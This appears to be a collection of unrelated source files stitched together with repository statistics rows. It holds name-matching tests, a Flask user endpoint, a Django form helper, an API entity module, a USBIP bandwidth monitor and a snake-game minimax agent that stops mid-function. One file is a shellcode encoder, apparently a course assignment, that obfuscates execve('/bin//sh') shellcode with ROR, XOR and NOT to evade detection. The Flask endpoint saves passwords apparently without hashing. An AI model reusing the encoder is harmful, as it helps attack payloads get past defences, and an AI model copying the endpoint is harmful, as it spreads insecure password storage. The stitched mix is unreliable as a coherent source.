assert_true(who.match(self.name, 'R. Liebowitz'))
assert_false(who.match(self.name, 'Robert E. E. Liebowitz'))
assert_false(who.match(self.name, 'R. E. E. Liebowitz'))
assert_true(who.match('R.E.E. Liebowitz', 'R. E. E. Liebowitz'))
def test_different_initials(self):
assert_false(who.match(self.name, 'E. R. Liebowitz'))
assert_false(who.match(self.name, 'E. Liebowitz'))
assert_false(who.match(self.name, 'R. V. Liebowitz'))
assert_false(who.match(self.name, 'O. E. Liebowitz'))
def test_short_names(self):
assert_true(who.match(self.name, 'Rob Liebowitz'))
# TODO: Should these be true?
assert_false(who.match(self.name, 'Bert Liebowitz'))
assert_false(who.match(self.name, 'Robbie Liebowitz'))
def test_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_true(who.match(name, 'Robert Liebowitz'))
assert_true(who.match(name, 'Robert Liebowitz Jr'))
assert_true(who.match(name, 'Robert Liebowitz, PhD'))
assert_false(who.match(name, 'Robert Liebowitz, Sr'))
assert_false(who.match(name, 'Robert Liebowitz, Sr, PhD'))
assert_true(who.match(name, 'Robert Liebowitz, Jr, PhD'))
def test_equivalent_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_true(who.match(name, 'Robert Liebowitz Jnr'))
assert_false(who.match(name, 'Robert Liebowitz Snr'))
def test_titles(self):
name = 'Mr. Robert Liebowitz'
assert_true(who.match(name, 'Robert Liebowitz'))
assert_true(who.match(name, 'Sir Robert Liebowitz'))
assert_true(who.match(name, 'Dr. Robert Liebowitz'))
assert_false(who.match(name, 'Mrs. Robert Liebowitz'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_true(who.match(name, 'Evan Liebowitz'))
assert_true(who.match('Evan Liebowitz', name))
assert_false(who.match(name, 'Wrongbert Lieobwitz'))
assert_false(who.match(name, 'Robert Evan'))
assert_false(who.match(name, 'Evan Liebowitz',
options={'check_nickname': False}))
class TestRatio(unittest.TestCase):
def setUp(self):
self.name = 'Robert Evan Liebowitz'
def test_string(self):
# Only relevant for python 2.X
assert_equal(who.ratio(self.name, str('Robert Liebowitz')), 100)
def test_unicode(self):
name = self.name
assert_equal(who.ratio(name, 'attaché Robert Evan Liebowitz'), 100)
assert_equal(who.ratio(name, 'Rōbért Èvān Lîęböwitz'), 100)
assert_true(who.ratio(name, 'Rōbért Èvān Lęîböwitz') < 100)
def test_name_and_initials(self):
assert_equal(who.ratio(self.name, 'R. Evan Liebowitz'), 100)
assert_equal(who.ratio(self.name, 'Robert E. Liebowitz'), 100)
assert_equal(who.ratio(self.name, 'R. E. Liebowitz'), 100)
def test_different_number_initials(self):
assert_equal(who.ratio(self.name, 'Robert Liebowitz'), 100)
assert_equal(who.ratio(self.name, 'R. Liebowitz'), 100)
assert_true(who.ratio(self.name, 'Robert E. E. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'R. E. E. Liebowitz') < 100)
assert_equal(who.ratio('R.E.E. Liebowitz', 'R. E. E. Liebowitz'), 100)
def test_different_initials(self):
assert_true(who.ratio(self.name, 'E. R. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'E. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'R. V. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'O. E. Liebowitz') < 100)
assert_true(who.ratio(self.name, 'E. R. Liebowitz') <
who.ratio(self.name, 'E. E. Liebowitz'))
assert_true(who.ratio(self.name, 'E. R. Liebowitz') <
who.ratio(self.name, 'R. R. Liebowitz'))
assert_true(who.ratio(self.name, 'E. R. Liebowitz') <
who.ratio(self.name, 'E. Liebowitz'))
def test_short_names(self):
assert_true(who.ratio(self.name, 'Rob Liebowitz'))
assert_true(who.ratio(self.name, 'Bert Liebowitz') < 100)
assert_true(who.ratio(self.name, 'Robbie Liebowitz') < 100)
assert_true(who.ratio(self.name, 'xxxxx Liebowitz') <
who.ratio(self.name, 'Bobby Liebowitz'))
def test_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_equal(who.ratio(name, 'Robert Liebowitz'), 100)
assert_equal(who.ratio(name, 'Robert Liebowitz Jr'), 100)
assert_equal(who.ratio(name, 'Robert Liebowitz, PhD'), 100)
assert_false(who.ratio(name, 'Robert Liebowitz, Sr'))
assert_false(who.ratio(name, 'Robert Liebowitz, Sr, PhD'))
assert_equal(who.ratio(name, 'Robert Liebowitz, Jr, PhD'), 100)
# Suffix doesn't change a match
assert_equal(who.ratio(name, 'Zachary Liebowitz, Jr'),
who.ratio(name, 'Zachary Liebowitz'))
def test_equivalent_suffixes(self):
name = 'Robert Liebowitz Jr'
assert_equal(who.ratio(name, 'Robert Liebowitz Jnr'), 100)
assert_false(who.ratio(name, 'Robert Liebowitz Snr'))
def test_titles(self):
name = 'Mr. Robert Liebowitz'
assert_equal(who.ratio(name, 'Robert Liebowitz'), 100)
assert_equal(who.ratio(name, 'Sir Robert Liebowitz'), 100)
assert_equal(who.ratio(name, 'Dr. Robert Liebowitz'), 100)
assert_false(who.ratio(name, 'Mrs. Robert Liebowitz'))
# Title doesn't change a match
assert_equal(who.ratio(name, 'Dr. Zachary Liebowitz'),
who.ratio(name, 'Zachary Liebowitz'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_equal(who.ratio(name, 'Evan Liebowitz'), 100)
assert_equal(who.ratio('Evan Liebowitz', name), 100)
assert_true(who.ratio(name, 'Wrongbert Lieobwitz') < 100)
assert_true(who.ratio(name, 'Robert Evan') < 100)
assert_true(who.ratio(name, 'Evan Liebowitz',
options={'check_nickname': False}) < 100)
assert_true(who.ratio(name, 'xxxx Liebowitz') <
who.ratio(name, 'xvax Liebowitz'))
assert_equal(who.ratio(name, 'xxxx Liebowitz'),
who.ratio(name, 'xvax Liebowitz', 'strict'))
# TODO: Should we ensure that the metadata is up to date?
@nottest
class TestConfig(unittest.TestCase):
def test_titles_all_defined(self):
"""
Check if list of titles is up to date with nameparser
"""
all_titles = (
config.MALE_TITLES |
config.FEMALE_TITLES |
config.GENDERLESS_TITLES
)
assert_equal(all_titles, NAMEPARSER_TITLES)
def test_suffixes_all_defined(self):
"""
Check if list of suffixes is up to date with nameparser
"""
from nameparser.config.suffixes import SUFFIX_ACRONYMS, SUFFIX_NOT_ACRONYMS
all_suffixes = (
config.UNIQUE_SUFFIXES |
config.MISC_SUFFIXES
)
nameparser_suffixes = (
SUFFIX_ACRONYMS |
SUFFIX_NOT_ACRONYMS
)
assert_equal(all_suffixes, nameparser_suffixes)
if __name__ == '__main__':
nose.main()
| 40.852941 | 83 | 0.636069 | 8,025 | 0.959469 | 0 | 0 | 840 | 0.10043 | 0 | 0 | 2,429 | 0.290411 |
c7a1b4eccd5313fe3d7a77b6d5633a8332809125 | 2,012 | py | Python | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
]
| null | null | null | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
]
| 1 | 2021-06-02T00:35:43.000Z | 2021-06-02T00:35:43.000Z | endpoints/UserEndpoint.py | GardenersGalore/server | f7d7f8ae07b56fc3c4fbe46f0784329cd94ace2d | [
"MIT"
]
| null | null | null | import json
from flask import request
from flask_restful import Resource, abort, reqparse
from models.User import User
"""
POST Creates a new resource.
GET Retrieves a resource.
PUT Updates an existing resource.
DELETE Deletes a resource.
"""
class UserEndpoint(Resource):
def post(self):
j = request.get_json()
# need to ensure the required fields are in the json
if "name" not in j:
abort(422, message="name is not in json body")
else:
name = j["name"]
if "username" not in j:
abort(422, message="username not in json body")
else:
username = j["username"]
if "email" not in j:
abort(422, message="email not in json body")
else:
email = j["email"]
if "password" not in j:
abort(422, message="password not in json body")
else:
password = j["password"]
user_obj = User(
name=name,
username=username,
email=email,
password=password,
)
if "phone_number" in j:
user_obj.phone_number = j["phone_number"]
if "experience" in j:
user_obj.experience = j["experience"]
if "pictureURL" in j:
user_obj.pictureURL = j["pictureURL"]
d = user_obj.save()
return json.loads(d.to_json())
def put(self):
# TODO
pass
def delete(self):
# TODO
pass
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('username', required=True, type=str, help='The username of the User')
args = parser.parse_args()
try:
user = json.loads(User.objects.get(username=args['username']).to_json())
except Exception as e:
print(e)
abort(404, message="User doesnt exist: {} doesn't exist".format(args['username']))
return user
| 24.240964 | 97 | 0.548708 | 1,719 | 0.854374 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.2833 |
c7a2778b2130c187c84f5bc78fd439f687e7ad10 | 450 | py | Python | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
]
| null | null | null | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
]
| 19 | 2017-02-18T17:53:56.000Z | 2017-03-11T22:09:06.000Z | passy_forms/forms/forms.py | vleon1/passy | fe48ed9f932eb6df9dbe463344b034218c81567b | [
"Apache-2.0"
]
| null | null | null | from django.forms import forms
class Form(forms.Form):
def get_value(self, name):
self.is_valid() # making sure we tried to clean the data before accessing it
if self.is_bound and name in self.cleaned_data:
return self.cleaned_data[name]
field = self[name]
return field.value() or ""
def to_dict(self):
return {name: self.get_value(name) for name in self.fields}
| 23.684211 | 86 | 0.622222 | 412 | 0.915556 | 0 | 0 | 0 | 0 | 0 | 0 | 63 | 0.14 |
c7a2d818488a83ba3e02cfaea886aa5551f314ae | 1,172 | py | Python | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
]
| 15 | 2015-08-11T09:50:00.000Z | 2021-10-02T19:30:53.000Z | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
]
| null | null | null | assignment4/rorxornotencode.py | gkweb76/SLAE | c0aef9610a5f75568a0e65c4a91a3bb5a56e6fc6 | [
"MIT"
]
| 9 | 2015-08-11T09:51:55.000Z | 2021-10-18T18:04:11.000Z | #!/usr/bin/python
# Title: ROR/XOR/NOT encoder
# File: rorxornotencode.py
# Author: Guillaume Kaddouch
# SLAE-681
import sys
ror = lambda val, r_bits, max_bits: \
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
shellcode = (
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
)
encoded = ""
encoded2 = ""
print "[*] Encoding shellcode..."
for x in bytearray(shellcode):
# ROR & XOR encoding
z = ror(x, 7, 8)^0xAA
# NOT encoding
y = ~z
if str('%02x' % (y & 0xff)).upper() == "00":
print ">>>>>>>>>> NULL detected in shellcode, aborting."
sys.exit()
if str('%02x' % (y & 0xff)).upper() == "0A":
print ">>>>>>>>>> \\xOA detected in shellcode."
if str('%02x' % (y & 0xff)).upper() == "0D":
print ">>>>>>>>>>> \\x0D detected in shellcode."
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' %(y & 0xff)
print "hex version : %s" % encoded
print "nasm version : %s" % encoded2
print "encoded shellcode : %s bytes" % str(len(encoded)/4)
| 23.44 | 102 | 0.562287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 529 | 0.451365 |
c7a32b4c1d013fec417f68425b02fe13d88c171e | 9,292 | py | Python | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
]
| null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
]
| null | null | null | authalligator_client/entities.py | closeio/authalligator-client | fe93c9d2333d2949e44c48a2dd0a9a266734e026 | [
"MIT"
]
| 1 | 2021-01-31T13:08:48.000Z | 2021-01-31T13:08:48.000Z | import datetime
from enum import Enum
from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union, cast
import attr
import ciso8601
import structlog
from attr import converters
from . import enums
from .utils import as_json_dict, to_snake_case
logger = structlog.get_logger()
class Omitted(Enum):
"""Singleton written in a way mypy can parse.
See https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions
for more details.
"""
token = 0
OMITTED = Omitted.token
"""A singleton to differentiate between omitted vs explicit :obj:`None`."""
# helper type for entity_converter
U = TypeVar("U", bound="BaseAAEntity")
def entity_converter(
entity_cls, # type: Union[List[Type[U]], Type[U]]
):
# type: (...) -> Callable[[Union[Omitted, U, Dict]], Union[U, Omitted]]
"""
Convert a dictionary response into instances of the entity class.
Usage:
# disambiguates between type_a and type_b based on ``__typename``
converter = entity_converter([TypeA, TypeB])
my_instance = converter({'__typename': 'TypeB'})
XXX: mypy isn't expressive enough to annotate that the return type will be
one of the _specific_ arg types and not the most generic bound base. We'll
unfortunately have to ``# type: ignore`` on lines that call this.
Args:
entity_cls: the class (or classes) the value should be converted into.
If multiple classes are provided as options, ``__typename`` must be
included in the reponse to support disambiguation.
Returns:
A callable that will convert a dictionary to the right entity type. If
more than one entity type is possible, that dictionary must have a
``__typename`` field present, which must match the ``TYPENAME`` on a
provided entity. If none of the provided types match of if the fields
don't align with the provided entity, a ``TypeError`` is raised.
"""
entity_classes = [] # type: List[Type[U]]
if isinstance(entity_cls, (list, tuple)):
entity_classes = entity_cls
else:
entity_classes = [entity_cls]
def _entity_converter(val):
# type: (Union[Dict[str, Any], U, Omitted]) -> Union[U, Omitted]
# check if it's explitly been omitted (don't try to convert those)
if val is OMITTED:
return val
# check if it's already an entity
if any([isinstance(val, e_cls) for e_cls in entity_classes]):
return cast(U, val)
# definitely a dict now, since we check what it was earlier. (present
# for type checking)
val = cast(Dict[str, Any], val)
# if there's more than one possibility for entity classes, pick the
# right one based on ``__typename``
if len(entity_classes) == 1:
# only one option, we don't need an explicit type
selected_cls = entity_classes[0] # type: Type[U]
else:
# a few different return types are expected
typename = val.pop("__typename", None)
if typename is None:
type_options = ", ".join([e.TYPENAME for e in entity_classes])
raise TypeError(
'No "__typename" present to disambiguate between possible '
"types: [{}]".format(type_options)
)
matching_typename = next(
(e for e in entity_classes if e.TYPENAME == typename), None
) # type: Optional[Type[U]]
if matching_typename is None:
raise TypeError('No entity found for type "{}"'.format(typename))
selected_cls = matching_typename
return selected_cls.from_api_response(val)
return _entity_converter
@attr.attrs(frozen=True)
class BaseAAEntity(object):
TYPENAME = "" # type: str
"""The name of the graphql type in the schema.
Used for disambiguation when there's more than one possible type being
returned.
"""
as_dict = as_json_dict
@classmethod
def from_api_response(cls, data):
# type: (Type[U], Dict[str, Any]) -> U
# If __typename is present, this asserts that it matches this class's
# expected typename
typename = data.pop("__typename", None)
if typename and typename != cls.TYPENAME:
raise TypeError(
(
"Given type \"{}\" doesn't match this entity's type: "
'"{}". Is {} the right entity for '
"this data?"
).format(typename, cls.TYPENAME, cls.__name__)
)
# convert top-level kwargs from camelCase to snake_case
kwargs = {to_snake_case(k): v for k, v in data.items()}
# mypy doesn't like that we're providing kwargs to a type whose init
# doesn't accept any kwargs (even though subclasses do have attributes)
return cls(**kwargs) # type: ignore
@attr.attrs(frozen=True)
class AccountError(BaseAAEntity):
TYPENAME = "AccountError"
code = attr.attrib(converter=enums.AccountErrorCode) # type: enums.AccountErrorCode
message = attr.attrib() # type: Optional[str]
retry_in = attr.attrib() # type: Optional[int]
@attr.attrs(frozen=True)
class Account(BaseAAEntity):
TYPENAME = "Account"
provider = attr.attrib(converter=enums.ProviderType) # type: enums.ProviderType
username = attr.attrib() # type: str
access_token = attr.attrib() # type: Optional[str]
access_token_expires_at = attr.attrib(
converter=converters.optional(ciso8601.parse_datetime),
) # type: Optional[datetime.datetime]
@attr.attrs(frozen=True)
class DeleteOperation(BaseAAEntity):
"""Base class for delete operation payloads.
These payloads don't actually have any field information in them. While
there's technically a "_" field in the schema, it's only a placeholder to
work around the language not supporting empty responses. It has no meaning
and will never have a meaningful value.
This class has no specific equivalent type, it's just a convenience type
for these entities.
"""
pass
@attr.attrs(frozen=True)
class DeleteOtherAccountKeysPayload(DeleteOperation):
TYPENAME = "DeleteOtherAccountKeysPayload"
@attr.attrs(frozen=True)
class DeleteAccountKeyPayload(DeleteOperation):
TYPENAME = "DeleteAccountKeyPayload"
@attr.attrs(frozen=True)
class DeleteAccountPayload(DeleteOperation):
TYPENAME = "DeleteAccountPayload"
@attr.attrs(frozen=True)
class AuthorizeAccountPayload(BaseAAEntity):
TYPENAME = "AuthorizeAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
account_key = attr.attrib() # type: str
number_of_account_keys = attr.attrib() # type: int
@attr.attrs(frozen=True)
class VerifyAccountPayload(BaseAAEntity):
TYPENAME = "VerifyAccountPayload"
account = attr.attrib(
converter=entity_converter(Account), # type: ignore[misc]
) # type: Account
@attr.attrs(frozen=True)
class Query(BaseAAEntity):
account = attr.attrib(
default=OMITTED,
converter=entity_converter([Account, AccountError]), # type: ignore[misc]
) # type: Union[Omitted, Account, AccountError]
@attr.attrs(frozen=True)
class Mutation(BaseAAEntity):
# mypy and the attrs plugin doens't like the `Omitted` default + converter
# stuff
authorize_account = attr.attrib( # type: ignore
default=OMITTED,
# ignore unsupport converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, AuthorizeAccountPayload, AccountError],
entity_converter([AuthorizeAccountPayload, AccountError]),
),
) # type: Union[Omitted, AuthorizeAccountPayload, AccountError]
verify_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, VerifyAccountPayload, AccountError],
entity_converter([VerifyAccountPayload, AccountError]),
),
) # type: Union[Omitted, VerifyAccountPayload, AccountError]
delete_account = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountPayload, AccountError],
entity_converter([DeleteAccountPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountPayload, AccountError]
delete_account_key = attr.attrib( # type: ignore
default=OMITTED,
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteAccountKeyPayload, AccountError],
entity_converter([DeleteAccountKeyPayload, AccountError]),
),
) # type: Union[Omitted, DeleteAccountKeyPayload, AccountError]
delete_other_account_keys = attr.attrib( # type: ignore
default=OMITTED,
# ignore unsupport converter warning
converter=cast( # type: ignore[misc]
Union[Omitted, DeleteOtherAccountKeysPayload, AccountError],
entity_converter([DeleteOtherAccountKeysPayload, AccountError]),
),
) # type: Union[Omitted, DeleteOtherAccountKeysPayload, AccountError]
| 35.19697 | 88 | 0.660461 | 5,400 | 0.581145 | 0 | 0 | 5,471 | 0.588786 | 0 | 0 | 4,293 | 0.46201 |
c7a3e79d5fcb0530f653c35813c95268647570c7 | 9,739 | py | Python | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
]
| 24 | 2019-01-25T20:40:07.000Z | 2020-11-20T08:12:14.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
]
| 3 | 2018-11-28T14:04:57.000Z | 2020-09-14T08:35:09.000Z | library/device.py | lompal/USBIPManager | b03d8d9c0befcd70b7f67cfe61c0664f48d2939d | [
"MIT"
]
| 6 | 2019-08-23T05:30:26.000Z | 2020-11-20T08:12:03.000Z | from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
class Signal(QObject):
""" PyQt signals for correct daemon device tree calls from a different thread """
addTopLevelItem_ = pyqtSignal(object)
setText_ = pyqtSignal(str, int, str)
setToolTip_ = pyqtSignal(str, int, object)
setIcon_ = pyqtSignal(str, int, object)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - emit the signal """
self.addTopLevelItem_.emit(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - emit the signal """
self.setText_.emit(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - emit the signal """
self.setToolTip_.emit(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - emit the signal """
self.setIcon_.emit(bid, col, icon)
# noinspection PyPep8Naming
class Tree(metaclass=config.Singleton):
""" Daemon device bandwidth tree """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._sw_config = ini.SWConfig(self._base)
self._lang = lang.Tree
self._signal = Signal()
self._signal.addTopLevelItem_.connect(lambda __daemon: self._addTopLevelItem(__daemon))
self._signal.setText_.connect(lambda __bid, __col, __baud: self._setText(__bid, __col, __baud))
self._signal.setToolTip_.connect(lambda __bid, __col, __html: self._setToolTip(__bid, __col, __html))
self._signal.setIcon_.connect(lambda __bid, __col, __icon: self._setIcon(__bid, __col, __icon))
def _getDaemon(self):
""" """
_root = self._base.dev_tree.invisibleRootItem()
for idx in range(_root.childCount()):
_daemon = _root.child(idx)
if _daemon.text(0) == self._ip_addr:
return _daemon, idx
return None, None
def _takeDaemon(self, idx):
""" """
return self._base.dev_tree.takeTopLevelItem(idx)
def _loadDaemon(self):
""" """
_daemon = QTreeWidgetItem([self._ip_addr])
self.addTopLevelItem(_daemon)
return _daemon, 0
def _getDevice(self, bid):
""" """
_daemon, _idx = self._getDaemon()
if not _daemon:
return None, None
for idx in range(_daemon.childCount()):
_dev = _daemon.child(idx)
if _dev.text(0) == bid:
return _daemon, _dev
return _daemon, None
def _addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - inner function """
self._base.dev_tree.addTopLevelItem(daemon)
self._base.dev_tree.expandAll()
def _setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_baud = _dev.child(0)
_baud.setText(col, baud)
def _setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setToolTip(col, html)
def _setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setIcon(col, icon)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item from a different thread """
self._signal.addTopLevelItem(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth from a different thread """
self._signal.setText(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set status tooltip for a daemon during capturing operation from a different thread """
self._signal.setToolTip(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation from a different thread """
self._signal.setIcon(bid, col, icon)
def loadDevice(self, bid):
""" """
_device = QTreeWidgetItem([bid])
_daemon, _idx = self._getDaemon()
if not _daemon:
_daemon, _idx = self._loadDaemon()
_daemon, _dev = self._getDevice(bid)
if _dev:
return
_daemon = self._takeDaemon(_idx)
if self._sw_config.dev_perf:
_baud = QTreeWidgetItem([self._lang.ParamBaud, self._lang.ParamNA, self._lang.ParamNA])
_device.addChild(_baud)
_daemon.addChild(_device)
self.addTopLevelItem(_daemon)
def unloadDevice(self, bid):
""" """
_daemon, _dev = self._getDevice(bid)
if _dev:
_daemon.removeChild(_dev)
def setIncoming(self, bid, baud):
""" Set incoming bandwidth """
self.setText(bid, 1, baud)
def setOutgoing(self, bid, baud):
""" Set outgoing bandwidth """
self.setText(bid, 2, baud)
# noinspection PyPep8Naming
class USBTop(metaclass=config.Singleton):
""" Daemon device bandwidth processing """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._loop = get_event_loop()
self._sw_config = ini.SWConfig(self._base)
self._manager = queue.Manager(self._base)
self._name_running = f'USBTOP processing running : {self._ip_addr}'
self._name_cancelling = f'USBTOP processing cancelling : {self._ip_addr}'
self._ssh = periphery.SSH(self._base, self._ip_addr)
self._log = log.Manager(self._base)
self._lang = lang.USBTop
self._tree = Tree(self._base, self._ip_addr)
self._dmn_perf = performance.Device(self._base)
self._thread = Thread()
self._event = Event()
self._pid = None
# noinspection PyMethodMayBeStatic
def _idx(self, row):
""" """
return [param for param in row.split() if param.isdigit()].pop()
def _processing(self, buf):
""" """
_bid = None
for row in buf:
if 'Bus ID' in row:
_bid = self._idx(row)
continue
if 'Device ID' in row:
_did = self._idx(row)
_value = row.split()
self._dmn_perf.setProcessing(self._ip_addr, _bid, _did, (_value[4], _value[6]))
def _exec(self):
""" Run the USBTOP processing - daemon thread """
_query = 'sudo usbtop'
_echo = self._ssh.exec(_query)
if not all(_echo):
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunQuery} : {_query}')
self._pid, _stdin, _stdout, _stderr = _echo
_buf = list()
while not self._event.is_set():
_line = _stdout.readline(2048)
if not _line:
return self._event.set()
if '\x1b[2J\x1b[1;1H' in _line:
self._processing(_buf)
_buf = list()
_buf.append(_line.strip().replace('\x1b[2J\x1b[1;1H', ''))
continue
_buf.append(_line.strip())
def __run(self):
""" Run the USBTOP processing - inner function """
self._event = Event()
self._thread = Thread(target=self._exec, name=self._name_running)
self._thread.start()
self._log.setSuccess(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunSuccess}')
self._event.wait()
return self._event.is_set()
async def _run(self):
""" Run the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeRun}')
if not await self._ssh.establish(self._lang.LogSeparator):
return self._log.setInformation(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
await self._loop.run_in_executor(None, self.__run)
if self.isRunning():
self.cancel()
async def _cancel(self):
""" Cancel the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if not self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeCancel}')
self._event.set()
self._thread.join()
if not self.isRunning():
self._ssh.kill(self._pid)
return self._log.setWarning(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelError}')
def run(self):
""" Run the USBTOP processing - calling coroutine """
self._manager.exec(self._run, self._name_running)
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive()
| 36.339552 | 118 | 0.618133 | 9,411 | 0.966321 | 0 | 0 | 0 | 0 | 1,399 | 0.143649 | 2,409 | 0.247356 |
c7a3f3c709f3111aed4b0e26101a434835f55c66 | 3,959 | py | Python | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
]
| 1 | 2022-01-09T13:59:34.000Z | 2022-01-09T13:59:34.000Z | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
]
| null | null | null | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
]
| null | null | null | DEPTH = 3
# Action
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
actlist[0]: top,
actlist[1]: bottom,
actlist[2]: left,
actlist[3]: right
}
def go(state, action, board_height, board_width):
if action == (-1, 0):
return ((state[0]+board_height-1) % board_height, state[1])
elif action == (1, 0):
return ((state[0]+1) % board_height, state[1])
elif action == (0, 1):
return (state[0], (state[1]+1) % board_width)
elif action == (0, -1):
return (state[0], (state[1]+board_width-1) % board_width)
class GameState:
obs = {}
is_end = False
def __init__(self, observation):
self.obs = {
1: observation[1].copy(),
2: observation[2].copy(),
3: observation[3].copy(),
4: observation[4].copy(),
5: observation[5].copy(),
6: observation[6].copy(),
7: observation[7].copy(),
'board_width': observation['board_width'],
'board_height': observation['board_height'],
}
def generateSuccessor(self, index, action):
successor = GameState(self.obs)
index += 2
head = tuple(successor.obs[index][0])
tar = list(Action.go(head, action, self.obs['board_height'], self.obs['board_width']))
for i in range(1, 8):
for cor in successor.obs[i]:
if cor == tar:
successor.is_end = True
if i == 1:
successor.obs[index].append(successor.obs[index][-1])
else:
successor.obs[index].clear()
successor.obs[index].insert(0, tar)
successor.obs[index].pop()
return successor
def evaluationFunction(self):
ans = 0
for i in range(2, 8):
if i < 5:
ans += len(self.obs[i])
else:
ans -= len(self.obs[i])
return ans
class MinimaxAgent:
def __init__(self, obs):
self.obs = obs
def value(self, gameState, index, depth, a, b):
index %= 6
if index == 0:
return self.maxValue(gameState, index, depth + 1, a, b)[0]
elif index < 3:
return self.maxValue(gameState, index, depth, a, b)[0]
else:
return self.minValue(gameState, index, depth, a, b)[0]
def maxValue(self, gameState, index, depth, a, b):
if gameState.is_end or depth >= DEPTH:
return [gameState.evaluationFunction(), None]
v = -10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value > v:
v = value
ac = action
if v >= b:
return [v, ac]
a = max(a, v)
return [v, ac]
def minValue(self, gameState, index, depth, a, b):
